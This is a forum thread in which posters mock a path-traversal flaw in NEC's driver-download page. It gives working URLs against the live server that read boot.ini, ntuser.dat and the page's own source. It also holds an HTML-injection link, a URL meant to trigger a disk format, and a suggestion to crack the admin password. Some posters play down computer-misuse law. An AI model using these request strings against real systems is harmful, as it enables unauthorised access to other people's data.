Was downloading drivers for my TV card from NEC Computers website, and noticed the URL looked rather odd.  Specifically, "http://202.188.160.140/user/user_nec_download.asp?driver_location=D:\Drivers\TV Tuner\Asus7134V2.3.0.4.exe" odd.  I thought to myself, "how about if I replaced that file location apparently on D: of the server, and took a shot at some system files?"  The results... may surprise you.

http://202.188.160.140/user/user_nec_download.asp?driver_location=C:\boot.ini 

More worrying though, is that the results probably wont surprise you.

I wonder if there is a http://202.188.160.140/user/user_nec_download.asp?driver_location=F:\Accounts\Business Accounts 2007.xls

or http://202.188.160.140/user/user_nec_download.asp?driver_location=C:\My Documents\OnlineBankingPasswords.doc

 

They should probably just have let the webserver do that part... I mean, it is designed to fetch files and send them, no need to reinvent the square wheel. Also, they need to upgrade, that's windows 2000 server.

Sadly enough I could not download autoexec.bat. IIS does not seem to work with an admin account :-(

there prob is no autoexec.bat

How about going after C:\pagefile.sys ? ...

fluffy777:

How about going after C:\pagefile.sys ? ...

I got an HTML page with "Persits.Upload.1 (0x800A001A) The process cannot access the file because it is being used by another process."

I always thought that windows's inability to share files between processes was just a bug that unix had figured out decades ago but microsoft couldn't fix. Maybe it's intentional, to make web applications more secure.

ailivac:

I always thought that windows's inability to share files between processes was just a bug that unix had figured out decades ago but microsoft couldn't fix. Maybe it's intentional, to make web applications more secure.

So instead of "Security through obscurity" they went with "Security through accidents"?

 

JFC! I did not believe this kind of stupid security hole possible....

death:

JFC! I did not believe this kind of stupid security hole possible....

 

I beleived it possible i just didn't think anyone would be stupid enough to actually do it.  

You can even download NTLDR :)

I think there could be some gems in http://202.188.160.140/user/user_nec_download.asp?driver_location=C:\documents and settings\administrator\ntuser.dat  :)  (replace with %20, etc as appropriate - I was lazy and let IE do the sub for me - no flaming for that please!! :D ).

And NEC work as huge systems integrators in some of our (Australian) government projects... Amazing!

MrYates:

I think there could be some gems in http://202.188.160.140/user/user_nec_download.asp?driver_location=C:\documents and settings\administrator\ntuser.dat  :)  (replace with %20, etc as appropriate - I was lazy and let IE do the sub for me - no flaming for that please!! :D ).

And NEC work as huge systems integrators in some of our (Australian) government projects... Amazing!

Isn't it possible to download the required files for a tool like John the Ripper and get the admin password? (btw, FF will also do that ;) ) 

element[0]:

death:

JFC! I did not believe this kind of stupid security hole possible....

 

I beleived it possible i just didn't think anyone would be stupid enough to actually do it.  

Ill add to make the intent clear:

... in a public production system. SOMEBODY other than creator must have seen it and approved it...

ailivac:

fluffy777:

How about going after C:\pagefile.sys ? ...

I got an HTML page with "Persits.Upload.1 (0x800A001A) The process cannot access the file because it is being used by another process."

I always thought that windows's inability to share files between processes was just a bug that unix had figured out decades ago but microsoft couldn't fix. Maybe it's intentional, to make web applications more secure.

Actually that unix doesn't by default support mandatory locks is the bug. Reading a file that's being updated can give bad data, and can lead to other problems, like not knowing what the most recent data is, which can lead to updates overwriting newer data with older data.

Microsoft has been ahead of *nix in this regard ever since MS-DOS 3.3

why?:

ailivac:

fluffy777:

How about going after C:\pagefile.sys ? ...

I got an HTML page with "Persits.Upload.1 (0x800A001A) The process cannot access the file because it is being used by another process."

I always thought that windows's inability to share files between processes was just a bug that unix had figured out decades ago but microsoft couldn't fix. Maybe it's intentional, to make web applications more secure.

Actually that unix doesn't by default support mandatory locks is the bug. Reading a file that's being updated can give bad data, and can lead to other problems, like not knowing what the most recent data is, which can lead to updates overwriting newer data with older data.

Microsoft has been ahead of *nix in this regard ever since MS-DOS 3.3

Unix supported both advisory and mandatory locking for years before Microsoft ever existed. You appear to be confused. Windows uses implicit locking, which is braindamaged and wrong: if you open a file for writing, the file is automatically locked. This generates a huge number of completely unnecessary locks, slowing the whole system down and creating deadlocks where none should exist. In the event of one application failing, it tends to spill over and break all other related applications.

The unix policy is quite simple: no locking unless the application asks for it. Unix applications have been supporting true concurrency since before Windows ever existed - not just some penny-ante desktop toys, but concurrent access on the server between thousands of users in real time. There are no significant defects with it, although the basic APIs are a little quirky (users who don't understand them should use a wrapper library rather than the native syscalls).

And this is before we even begin to talk about network filesystems, where you really, really want to use advisory locking. Mandatory locking has significant performance and stability issues there, so should normally be avoided.

ahhh thats wonderful.

 

the download page itself has a few wtfs. check this out:

 

http://202.188.160.140/user/user_driver.asp?driver_id=1&model=%3Ca%20href=%22http://dailywtf.com%22%3EThis%20page%20is%20a%20huge%20wtf!%3C/a%3E&driver_category_id=4&model_series=Versa%20FX%20Series&product_category=Shitty%20website&model_id=-169 

Brillant.

 

Surely someone with a clue should have at least given this a once over before it went live.

bonus points for figuring out the path to the asp pages so we can look at the wtfs found in the source itself. that should be fun.

 

Under UK law at least, this may constitute hacking.

1(1) A person is guilty of an offence if:

a) He causes a computer to perform any function with intent to secure access to any program or data held in a computer;b) the access he intends to secure is unauthorized; andc) he knows at the time when he causes the computer to perform the function that this is the case. It would be for a court to decided whether data being acessible online, but with the location not published, constitutes authorisation. But I would expect not.

asuffield:

Unix supported both advisory and mandatory locking for years before Microsoft ever existed. You appear to be confused. Windows uses implicit locking, which is braindamaged and wrong: if you open a file for writing, the file is automatically locked. This generates a huge number of completely unnecessary locks, slowing the whole system down and creating deadlocks where none should exist. In the event of one application failing, it tends to spill over and break all other related applications.

 

And now Windows is, well, locked into this scheme because of all the software that's been written to expect things to work this way.  (I may be mistaken on this point, though, feel free to correct me)

 

m0ffx:

Under UK law at least, this may constitute hacking.

1(1) A person is guilty of an offence if:

a) He causes a computer to perform any function with intent to secure access to any program or data held in a computer;b) the access he intends to secure is unauthorized; andc) he knows at the time when he causes the computer to perform the function that this is the case. It would be for a court to decided whether data being acessible online, but with the location not published, constitutes authorisation. But I would expect not.

There is only one branch of the UK police with the authority to investigate these things with a view to prosecution, and they're now part of the serious organised crime group. Local police forces are instructed to forward all such cases to that group for official ignoring. Hence, the only way to get prosecuted for computer misuse is to (a) work for the mob, or (b) offend somebody with enough political clout to get the Home Office involved.

Aside from that, this law has been tossed onto the large pile of UK laws that are never enforced. Nobody even cares about computer crime any more, there hasn't been a movie about it in like forever.

http://202.188.160.140/user/user_nec_download.asp?driver_location=format%20C:%5C%20/X%20%3C%3Cyes

 

not that I'd want anyone to go and try... 

asuffield:

Nobody even cares about computer crime any more, there hasn't been a movie about it in like forever.

But and Swordfish! 

petvirus:

bonus points for figuring out the path to the asp pages so we can look at the wtfs found in the source itself. that should be fun.

 

http://202.188.160.140/user/user_nec_download.asp?driver_location=C:\Inetpub\wwwroot\ODDS\User\user_nec_download.asp 

Edit: 

 Looks like this is a personal computer. Has bittorrent, splintercell, skype and other games/user apps on it.

 

m0ffx:

a) He causes a computer to perform any function with intent to secure access to any program or data held in a computer;
b) the access he intends to secure is unauthorized; and
c) he knows at the time when he causes the computer to perform the function that this is the case.

It would be for a court to decided whether data being acessible online, but with the location not published, constitutes authorisation. But I would expect not.

A) FTP servers are not allowed in the UK?
B) Obviously this is authorized, who would even fathom that this is actually in anyway secure? He is a kind contributor to the OSS movement.
C) See B.